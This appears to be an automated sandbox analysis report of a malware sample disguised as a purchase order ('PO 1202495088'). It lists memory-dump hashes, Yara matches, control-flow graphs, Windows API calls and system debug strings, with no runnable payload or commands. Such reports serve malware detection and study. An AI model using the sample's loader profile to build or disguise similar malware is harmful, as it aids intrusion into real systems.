                                                                                          • Instruction ID: 422e5bb7b5dfd19c699d0086eef25ce4a16d4c7bd2af6405fcb944c362a0748a
                                                                                          • Opcode Fuzzy Hash: d44e13c3577c25c3ed3ed173e849121b503c1e3bd5f81b69a92cd8c36f5e6559
                                                                                          • Instruction Fuzzy Hash: 08514A71E056588BEB68CF6B994579EFBF3AFC9300F14C1BAD50CA6264DB300A858F51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: e6957ae63e09b64c58e45b7fba3f8eefaa09a7040d6fd69a52e838f0b066c5e0
                                                                                          • Instruction ID: 22cc83cd227f74b154d0fc41f8beab4194c1ca10a98df8f10ed6cbc9d3750eb4
                                                                                          • Opcode Fuzzy Hash: e6957ae63e09b64c58e45b7fba3f8eefaa09a7040d6fd69a52e838f0b066c5e0
                                                                                          • Instruction Fuzzy Hash: A132F2B5E012198FDB14DFA9C880AEEFBF6FF88300F1485A9D559A7244DB345A85CF90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6420f96662e933c2fbe7fe04ee7c2a3eccf8493b18251d64df1bbd3798486970
                                                                                          • Instruction ID: fa800e02d3a3e1ae893e2d9313910c5d2255929b5068e2bbd55679b5f9b345ce
                                                                                          • Opcode Fuzzy Hash: 6420f96662e933c2fbe7fe04ee7c2a3eccf8493b18251d64df1bbd3798486970
                                                                                          • Instruction Fuzzy Hash: 88E1F6B4E002198FCB14DFA9C5809AEFBB2FF89314F648569E515AB355DB30A942CF60
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ff4f7934f48a39d58e831d585f5b5dfc0fcdb8cd24693c5c337341bc5f14c9b
                                                                                          • Instruction ID: 4e680e806bcc06426fef19c6c2aad18a801bdebb3b0906cad0efbfa413707883
                                                                                          • Opcode Fuzzy Hash: 5ff4f7934f48a39d58e831d585f5b5dfc0fcdb8cd24693c5c337341bc5f14c9b
                                                                                          • Instruction Fuzzy Hash: F3E1FAB4E001198FCB14DFA9C5849AEFBB2FF89304F248169D515AB356DB31AD42CFA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 5ff5dd4b1bc02087fd8abd7a5a0b1d405e227ff98b85b0220cb109c47a0b523e
                                                                                          • Instruction ID: b35c4f80e3ec5b155ea392b79f618318175862988fb004c4504f20cd1d8cd04b
                                                                                          • Opcode Fuzzy Hash: 5ff5dd4b1bc02087fd8abd7a5a0b1d405e227ff98b85b0220cb109c47a0b523e
                                                                                          • Instruction Fuzzy Hash: 1EE1E7B4E001598FCB14CFA9C5809AEFBB2FF89304F248169E515AB355DB31AD42CFA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7f784f2d481fca24207f67a6263b429f1d867d0068570c09853f8fe476d8970d
                                                                                          • Instruction ID: 2a9267a1f6a7a743c47c1bd4c9c1c3a02fb26c65d0fef88a68eb810eccc886d8
                                                                                          • Opcode Fuzzy Hash: 7f784f2d481fca24207f67a6263b429f1d867d0068570c09853f8fe476d8970d
                                                                                          • Instruction Fuzzy Hash: A4E1F7B4E001598FCB14CFA9C580AAEFBB2FF89304F248169D555AB356DB30AD42CF61
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 719c7708a7ab412b5cb3c39bd7cf7e1472966fc897d8329c79c67fbacae6bc27
                                                                                          • Instruction ID: 22878f33dbf57f744002388762b9371df54ddefcf6f53f7c2e0c3e6c1fce6df1
                                                                                          • Opcode Fuzzy Hash: 719c7708a7ab412b5cb3c39bd7cf7e1472966fc897d8329c79c67fbacae6bc27
                                                                                          • Instruction Fuzzy Hash: 19E1E6B4E001198FDB14DFA9C5809AEBBF2FF89304F248169E515AB355DB31AD42CFA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1a9af6a58f70f08550cdf7c8a9c7bebade99310672575aea44c2797abd655bc7
                                                                                          • Instruction ID: 94c4e2d08039f9fb17affa2a14978b64db1680d8a6967ba7adbfe72c70200312
                                                                                          • Opcode Fuzzy Hash: 1a9af6a58f70f08550cdf7c8a9c7bebade99310672575aea44c2797abd655bc7
                                                                                          • Instruction Fuzzy Hash: 7DB1F875E06209DFDB18CFA6D58069EFBB2FF99300F24942AD415AB254EB349A46CF10
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9037a27aa4c4d569b734d82dae4078e9f4e4661c524be8b56030f3fa19eb53dc
                                                                                          • Instruction ID: f2def915002da4641606d8c794df7e78efb467a2199e3ff1d0089a41cc2ac64f
                                                                                          • Opcode Fuzzy Hash: 9037a27aa4c4d569b734d82dae4078e9f4e4661c524be8b56030f3fa19eb53dc
                                                                                          • Instruction Fuzzy Hash: E581F274A1520ACFCB44CFA9D98499EFBF1FF88310B24996AD415AB360D330AA42CF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f1bb8a6901669644e104aef0c3d4e4b290add75a9370ac6eaa46b093a4d90e90
                                                                                          • Instruction ID: c9b8653ff07bd696aacdd213bfcb147ff2dc8afd478974f477ab7272f5f4c251
                                                                                          • Opcode Fuzzy Hash: f1bb8a6901669644e104aef0c3d4e4b290add75a9370ac6eaa46b093a4d90e90
                                                                                          • Instruction Fuzzy Hash: A891C074A1521ACFCB04CFA9D58499EFBF2FF88310F24996AD415AB364D331AA42CF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f6896b916de70a5093b9b03907eaa565f9cbb9909e63e9f95fcb7f4183499ac1
                                                                                          • Instruction ID: 416a86f6eea514c099d5f712944f13a1a73a101c4dc21ab8689121d5d86aa644
                                                                                          • Opcode Fuzzy Hash: f6896b916de70a5093b9b03907eaa565f9cbb9909e63e9f95fcb7f4183499ac1
                                                                                          • Instruction Fuzzy Hash: BB71F874E16A098FCB04CFA9C9805DEFBF2FF89610F24D46AD415BB354D3359A428B64
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: c9d0cc943916bf601ad337b8e92bb2cd4b46d4f5d6688475ae4afc5f60b55e84
                                                                                          • Instruction ID: 3eaefd0e8f2a1116856540b0fa2dd8b4c667d11c43ed77e7d70e3a35beddcf65
                                                                                          • Opcode Fuzzy Hash: c9d0cc943916bf601ad337b8e92bb2cd4b46d4f5d6688475ae4afc5f60b55e84
                                                                                          • Instruction Fuzzy Hash: 2F71B474E16A09CFCB04CFA9C5805DEFBF2FF89610F24946AD415BB354D3359A428B68
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 7cb673ff6119d1fc698a75075e25bd8c663f5575d316e13e57b289b0f7243e2e
                                                                                          • Instruction ID: 9155c17f9fe298dbb2e83192d9de447e58388e41212abf932aa7a639346e507c
                                                                                          • Opcode Fuzzy Hash: 7cb673ff6119d1fc698a75075e25bd8c663f5575d316e13e57b289b0f7243e2e
                                                                                          • Instruction Fuzzy Hash: AA51F9B4E002198FCB14DFA9D5809AEFBF2FF89304F24816AD519AB355D7319942CFA1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 46c18877544d8ac7684b2d5fc45e99e7906cc05eff31eb36e6f1a45552399847
                                                                                          • Instruction ID: 74fcd067cd0b6d7f0aa59f620135ca4edfa529d2733ea10b386cdba09e02d6d7
                                                                                          • Opcode Fuzzy Hash: 46c18877544d8ac7684b2d5fc45e99e7906cc05eff31eb36e6f1a45552399847
                                                                                          • Instruction Fuzzy Hash: 754128B2E0660A9FCB44CFA9C5815AEFBF2FF88640F24C56AC415E7354E7309A418F95
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 01b0a946ee58b49d0235d605c8f8cb3b03fbcf2edf358804d98702235a54d6e1
                                                                                          • Instruction ID: 75d70507ae31c46de1f0778e38258991dd4205e9aec8a28a71c577a8a286a91a
                                                                                          • Opcode Fuzzy Hash: 01b0a946ee58b49d0235d605c8f8cb3b03fbcf2edf358804d98702235a54d6e1
                                                                                          • Instruction Fuzzy Hash: A541E5B1E0660ADFCB44CFAAC5815AEFBF2BF88640F24D56AC415B7214D7309A418FA4
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity

                                                                                          Execution Graph

                                                                                          Execution Coverage:1.4%
                                                                                          Dynamic/Decrypted Code Coverage:5.6%
                                                                                          Signature Coverage:8.3%
                                                                                          Total number of Nodes:144
                                                                                          Total number of Limit Nodes:10

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 293 417eb3-417ecf 294 417ed7-417edc 293->294 295 417ed2 call 42f933 293->295 296 417ee2-417ef0 call 42ff33 294->296 297 417ede-417ee1 294->297 295->294 300 417f00-417f11 call 42e3d3 296->300 301 417ef2-417efd call 4301d3 296->301 306 417f13-417f27 LdrLoadDll 300->306 307 417f2a-417f2d 300->307 301->300 306->307
                                                                                          APIs
                                                                                          • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F25
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 318 42ccc3-42ccfc call 404b43 call 42ded3 NtClose
                                                                                          APIs
                                                                                          • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CCF7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close
                                                                                          • String ID:
                                                                                          • API String ID: 3535843008-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 332 13f2a80-13f2a8c LdrInitializeThunk
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 38 414703-414713 39 41471c-414771 call 42f803 call 417eb3 call 404ab3 call 4254d3 38->39 40 414717 call 42edf3 38->40 50 414793-414798 39->50 51 414773-414784 PostThreadMessageW 39->51 40->39 51->50 52 414786-414790 51->52 52->50
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: --cG1-69-$--cG1-69-
                                                                                          • API String ID: 1836367815-2696456154

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 53 4146b8-4146bc 54 41472e-414771 call 417eb3 call 404ab3 call 4254d3 53->54 55 4146be-4146d4 53->55 62 414793-414798 54->62 63 414773-414784 PostThreadMessageW 54->63 55->54 63->62 64 414786-414790 63->64 64->62
                                                                                          APIs
                                                                                          • PostThreadMessageW.USER32(--cG1-69-,00000111,00000000,00000000), ref: 00414780
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: MessagePostThread
                                                                                          • String ID: --cG1-69-$--cG1-69-
                                                                                          • API String ID: 1836367815-2696456154

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 313 42d023-42d067 call 404b43 call 42ded3 RtlFreeHeap
                                                                                          APIs
                                                                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,4E8B0446,00000007,00000000,00000004,00000000,00417735,000000F4), ref: 0042D062
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FreeHeap
                                                                                          • String ID:
                                                                                          • API String ID: 3298025750-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 308 42cfd3-42d014 call 404b43 call 42ded3 RtlAllocateHeap
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(?,0041EC5B,?,?,00000000,?,0041EC5B,?,?,?), ref: 0042D00F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 323 42d073-42d0af call 404b43 call 42ded3 ExitProcess
                                                                                          APIs
                                                                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,220AB2FE,?,?,220AB2FE), ref: 0042D0AA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_400000_PO 1202495088.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ExitProcess
                                                                                          • String ID:
                                                                                          • API String ID: 621844428-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 328 13f2b2a-13f2b2f 329 13f2b3f-13f2b46 LdrInitializeThunk 328->329 330 13f2b31-13f2b38 328->330
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          Strings
                                                                                          • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0146890C
                                                                                          • The critical section is owned by thread %p., xrefs: 014689E9
                                                                                          • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 01468953
                                                                                          • *** Resource timeout (%p) in %ws:%s, xrefs: 01468982
                                                                                          • *** An Access Violation occurred in %ws:%s, xrefs: 01468ABF
                                                                                          • *** then kb to get the faulting stack, xrefs: 01468B4C
                                                                                          • *** Inpage error in %ws:%s, xrefs: 01468A48
                                                                                          • write to, xrefs: 01468AD6
                                                                                          • The resource is owned exclusively by thread %p, xrefs: 014689A4
                                                                                          • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 01468AB4
                                                                                          • The instruction at %p referenced memory at %p., xrefs: 01468A62
                                                                                          • This failed because of error %Ix., xrefs: 01468A76
                                                                                          • The instruction at %p tried to %s , xrefs: 01468AE6
                                                                                          • *** enter .exr %p for the exception record, xrefs: 01468B21
                                                                                          • *** A stack buffer overrun occurred in %ws:%s, xrefs: 01468923
                                                                                          • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 01468AAD
                                                                                          • *** enter .cxr %p for the context, xrefs: 01468B3D
                                                                                          • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 01468B6F
                                                                                          • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 01468944
                                                                                          • an invalid address, %p, xrefs: 01468AFF
                                                                                          • a NULL pointer, xrefs: 01468B10
                                                                                          • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 014689CB
                                                                                          • <unknown>, xrefs: 014688AE, 01468901, 01468980, 014689C9, 01468A47, 01468ABE
                                                                                          • read from, xrefs: 01468ADD, 01468AE2
                                                                                          • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 014689BF
                                                                                          • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 01468A06
                                                                                          • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 01468AA6
                                                                                          • The resource is owned shared by %d threads, xrefs: 014689AE
                                                                                          • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 01468935
                                                                                          • Go determine why that thread has not released the critical section., xrefs: 014689F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • API String ID: 0-108210295
                                                                                          Strings
                                                                                          • corrupted critical section, xrefs: 014252CD
                                                                                          • Thread is in a state in which it cannot own a critical section, xrefs: 0142534E
                                                                                          • Critical section debug info address, xrefs: 0142522A, 01425339
                                                                                          • Invalid debug info address of this critical section, xrefs: 014252C1
                                                                                          • Critical section address., xrefs: 0142530D
                                                                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014252ED
                                                                                          • Critical section address, xrefs: 01425230, 014252C7, 0142533F
                                                                                          • Thread identifier, xrefs: 01425345
                                                                                          • 8, xrefs: 014250EE
                                                                                          • Address of the debug info found in the active list., xrefs: 014252B9, 01425305
                                                                                          • undeleted critical section in freed memory, xrefs: 01425236
                                                                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 01425215, 014252A1, 01425324
                                                                                          • double initialized or corrupted critical section, xrefs: 01425313
                                                                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014252D9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • API String ID: 0-2368682639
                                                                                          Strings
                                                                                          • @, xrefs: 014223A5
                                                                                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01422310
                                                                                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01422213
                                                                                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014220EE
                                                                                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 01422429
                                                                                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 014222A2
                                                                                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 0142240C
                                                                                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 0142242E
                                                                                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 0142221C
                                                                                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014222CA
                                                                                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014223F5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000004.00000002.1464816482.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_4_2_1380000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
